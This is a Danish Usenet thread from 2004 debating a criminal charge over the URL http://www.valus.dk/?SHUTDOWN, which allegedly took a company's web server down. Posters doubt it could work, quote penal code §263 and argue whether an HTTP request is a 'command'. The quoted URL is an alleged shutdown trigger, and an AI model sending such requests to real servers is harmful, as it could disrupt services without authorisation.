må være kendt af de fleste søgemaskiner.

I øvrigt har Cubus forklaret, at han ikke troede på, at
han havde lukket serveren ned. Han mente, at det var
urealistisk, og der måtte være en anden forklaring. F.eks.
at URLen havde gjort noget ved hans egen computer.

Jeg har set tilfælde, hvor et site ved modtagelse af en
fuldstændig legitim request i nogle tilfælde vælger at
blokere klientens IP adresse i deres firewall. Det vil
sige at set fra mit sysnspunkt så det virkelig ud som om
serveren gik ned, blot man sendte den en "GET / HTTP/1.0"
request. (Jeg tror jeg fik blacklistet fem forskellige
IP adresser før jeg fandt ud af, at de blacklistede alle
klienter, der sendte en request uden en bestemt valgfri
header).

Dermed må Cubus undskyldning faktisk betragtes som
sandsynlig. Jeg har oplevet et tilfælde, hvor et system
sat op ad en inkompetent administrator, får det til at
se ud som om serveren er gået ned, men kun for den ene
klient, der sendte requesten. Jeg har kendskab til et
andet site, hvor en inkompetent administrator vælger at
filtrere udvalgte nøgleord i URLen i stedet for at rette
fejlen i den sårbare kode.

Havde man sat disse to inkomptente administatorer sammen
kunne de sagtens være nået frem til en opsætning, hvor
http://www.valus.dk/?SHUTDOWN tilsyneladende fik serveren
til at gå ned. Men hvor det der i virkeligheden skete var,
at klientens IP adresse blev midlertidigt blacklistet i
firewall opsætningen.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kasper Dupont <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> writes:

[...]
>Dermed må Cubus undskyldning faktisk betragtes som
>sandsynlig.

Den side af sagen skal jeg ikke tage stilling til. Men jeg er ret
sikker på, at Valus ikke ville politianmelde nogen, der, straks de
havde konstateret problemet, informerede dem om hullet. Det kan så
godt ske, at politiet alligevel var kommet på besøg, fordi de bare
havde fået hele logfilen. Men mon ikke det ville have betydet en
hel del for alles opfattelse af sagen, hvis man samtidig kunne vise
en e-mail til firmaet med information om deres hul?

>Havde man sat disse to inkomptente administatorer sammen
>kunne de sagtens være nået frem til en opsætning, hvor
>http://www.valus.dk/?SHUTDOWN tilsyneladende fik serveren
>til at gå ned. Men hvor det der i virkeligheden skete var,
>at klientens IP adresse blev midlertidigt blacklistet i
>firewall opsætningen.

Tjah, men hvad ville der så ske, hvis du skrev en e-mail alligevel?
De ville nok bare grine lidt og hygge sig over det herlige system,
de har fundet på.

Mvh.
   Klaus.

---

Klaus Ellegaard wrote:

> Den side af sagen skal jeg ikke tage stilling til. Men jeg er ret
> sikker på, at Valus ikke ville politianmelde nogen, der, straks de
> havde konstateret problemet, informerede dem om hullet.

Hvilken del af Valus' handlingsmønster er det der får dig på den tanke?

--
Niels Callesøe - dk pfy
pfy[at]nntp.dk - http://www.pcpower.dk/disclaimer.php
Bogus virus warnings are spam. Reject them using Postfix:
http://www.t29.dk/antiantivirus.txt

---

>Men jeg vil svært gerne have at vide hvilken paragraf han har
>overtrådt. Jeg kan nemlig ikke selv finde en der dækker. En hel
>del af paragrafferne i straffeloven som man kunne overveje, har
>nemlig en passus med "for at skaffe sig eller andre uberettiget
>vinding", og det er ikke tilfældet her

Tja iflg. hans eget referat af retsmødet så er det :

"sigtet for overtrædelse af straffelovens paragraf 263 stykke 2 og
forsøg herpå, jævnfør paragraf 21"



§ 263. Med bøde eller fængsel indtil 6 måneder straffes den, som
uberettiget

1) bryder eller unddrager nogen et brev, telegram eller anden lukket
meddelelse eller optegnelse eller gør sig bekendt med indholdet,

2) skaffer sig adgang til andres gemmer,

3) ved hjælp af et apparat hemmeligt aflytter eller optager
udtalelser fremsat i enrum, telefonsamtaler eller anden samtale mellem
andre eller forhandlinger i lukket møde, som han ikke selv deltager i,
eller hvortil han uberettiget har skaffet sig adgang.

Stk. 2. Med bøde eller fængsel indtil 6 måneder straffes den, som
uberettiget skaffer sig adgang til en andens oplysninger eller
programmer, der er bestemt til at bruges i et anlæg til elektronisk
databehandling.

Stk. 3. Begås de i stk. 1 eller 2 nævnte forhold med forsæt til at
skaffe sig eller gøre sig bekendt med oplysninger om en virksomheds
erhvervshemmeligheder eller under andre særlig skærpende
omstændigheder, kan straffen stige til fængsel indtil 4 år.


Dennis C

---

Dennis C skrev:

>>Men jeg vil svært gerne have at vide hvilken paragraf han har
>>overtrådt.

>Tja iflg. hans eget referat af retsmødet så er det :

Jeg spurgte ikke hvad han var anklaget for. Det ved jeg godt, og
jeg har genlæst den paragraf flere gange. Jeg kan ikke se at den
er relevant for sagen (ud over at den er fremsat af anklageren).

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

In article <40C1DCB0.6BB7F38C@skrammel.yaboo.dk>, Kasper Dupont wrote:
> Kommunikationen mellem browseren og serveren er defineret
> i RFC 2616. Ifølge min ordbog er det engelske ord for
> kommando command eller i enkelte specielle tilfælde order.
> Ordet command bliver overhovedet ikke brugt i RFC 2616.
> Ordet order bliver brugt men kun i betydningen rækkefølge
> og i sammensætningen "in order to", der betyder "for at".
> Der er altså ingen tvivl om, at der ikke er noget, der
> hedder kommandoer i HTTP protokollen. Og kommando er
> derfor et forkert ordvalg.

Enig, så via http protokollen sender man en
forspørgelse på at udføre en kommando.

Kommandoen forgår på et højere lag, på applikationslaget,
ikke i http laget.

--
Mvh.
Christian E. Lysel
http://www.spindelnet.dk/

---

Den Sat, 05 Jun 2004 15:29:34 +0200 skrev Kim Ludvigsen:
> Kasper Dupont wrote:
>>
>> Normalt ville jeg ikke hænge mig så meget i om man kaldte
>> det requests eller kommandoer. Men i et anklageskrift kan
>> man altså ikke være så lemfældig med detaljerne.
>
> Måske der også er forskel på, hvad man i edb-verdenen kalder en
> kommando, og hvad man andre steder kalder en kommando. Jeg mener i hvert
> fald, at det godt kan forsvares at kalde det at sende en kommando, idet
> man beder serveren om at udføre en bestemt handling. Men måske den
> diskussion hører mere hjemme i sproggruppen.

Siden hvornår har "må jeg have lov at se siden /publicering" været en
kommando?

Det er så op til serveren at sige "ja, den er her", eller "nej, det må
du ikke".

Mvh
Kent
--
Help test this great MMORPG game - http://www.eternal-lands.com/

---

Kent Friis wrote:

> Siden hvornår har "må jeg have lov at se siden /publicering" været en
> kommando?

Det er der heller ingen, der har sagt, at det er. Det gør en vis
forskel, om du hæfter en kommando/parameter/hvad du vil kalde det - som
for eksempel Shutdown - på til sidst.

--
Mvh. Kim Ludvigsen

---

Kim Ludvigsen wrote:
>
> Kent Friis wrote:
>
> > Siden hvornår har "må jeg have lov at se siden /publicering" været en
> > kommando?
>
> Det er der heller ingen, der har sagt, at det er.

Jo. Det er der:
http://cubus-adsl.dk/elteknik/div/valushacker_orientering_0404.php

> Det gør en vis
> forskel, om du hæfter en kommando/parameter/hvad du vil kalde det - som
> for eksempel Shutdown - på til sidst.

Nej. Det gør ingen forskel. Linien i sin helhed er stadig
ikke en kommando. Det kan da godt være, at det der stod
til sidst, ville være en kommando, hvis det blev sendt til
en SQL server. Men det har Cubus ikke gjort. Og det er i
øvrigt slet ikke det anklagen går på. Anklagen går på den
linie, Cubus har sendt til webserveren. Og det er ikke en
kommando.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kasper Dupont wrote:
>
> Kim Ludvigsen wrote:
> >
> > Kent Friis wrote:
> >
> > > Siden hvornår har "må jeg have lov at se siden /publicering" været en
> > > kommando?
> >
> > Det er der heller ingen, der har sagt, at det er.
>
> Jo. Det er der:
> http://cubus-adsl.dk/elteknik/div/valushacker_orientering_0404.php

Ikke for at være ordkløver, men Kent Friis' sætning er ikke den samme,
som den der står i sigtelsen. Hvis man kun beder om at se siden
/publicering, så vil serveren ikke blive lukket.

> > Det gør en vis
> > forskel, om du hæfter en kommando/parameter/hvad du vil kalde det - som
> > for eksempel Shutdown - på til sidst.
>
> Nej. Det gør ingen forskel. Linien i sin helhed er stadig
> ikke en kommando.

Vi er stadig ude i sproglige petitesser her. Jeg kunne godt tænke mig,
en af juristerne give et bud på, hvor meget vægt en dommer vil lægge på,
om ordvalget er korrekt i teknisk fagsprog. Personligt vil jeg stadig
ikke tøve med at kalde linjen en kommando, man beder et program på
serveren udføre en handling - uanset hvordan det rent teknisk foregår.

Vi kommer ikke meget videre, før vi får et mere juridisk input, så
indtil da EOD herfra.

--
Mvh. Kim Ludvigsen

---

Den Sat, 05 Jun 2004 23:30:08 +0200 skrev Kim Ludvigsen:
> Kasper Dupont wrote:
>>
>> Kim Ludvigsen wrote:
>> >
>> > Kent Friis wrote:
>> >
>> > > Siden hvornår har "må jeg have lov at se siden /publicering" været en
>> > > kommando?
>> >
>> > Det er der heller ingen, der har sagt, at det er.
>>
>> Jo. Det er der:
>> http://cubus-adsl.dk/elteknik/div/valushacker_orientering_0404.php
>
> Ikke for at være ordkløver, men Kent Friis' sætning er ikke den samme,
> som den der står i sigtelsen. Hvis man kun beder om at se siden
> /publicering, så vil serveren ikke blive lukket.

Har du hørt om forkortelser?

>> > Det gør en vis
>> > forskel, om du hæfter en kommando/parameter/hvad du vil kalde det - som
>> > for eksempel Shutdown - på til sidst.
>>
>> Nej. Det gør ingen forskel. Linien i sin helhed er stadig
>> ikke en kommando.
>
> Vi er stadig ude i sproglige petitesser her.

Det kommer an på...

> Jeg kunne godt tænke mig,
> en af juristerne give et bud på, hvor meget vægt en dommer vil lægge på,
> om ordvalget er korrekt i teknisk fagsprog.

Det er ikke kun ordvalget der er forkert, manden er anklaget for at have
gjort noget der ikke kan lade sig gøre.

Jeg ved ikke hvad det danske retssystem vil sige til den situation, men
i et civiliseret land kan man ikke dømmes for at gøre noget der ikke kan
lade sig gøre.

Mvh
Kent
--
Help test this great MMORPG game - http://www.eternal-lands.com/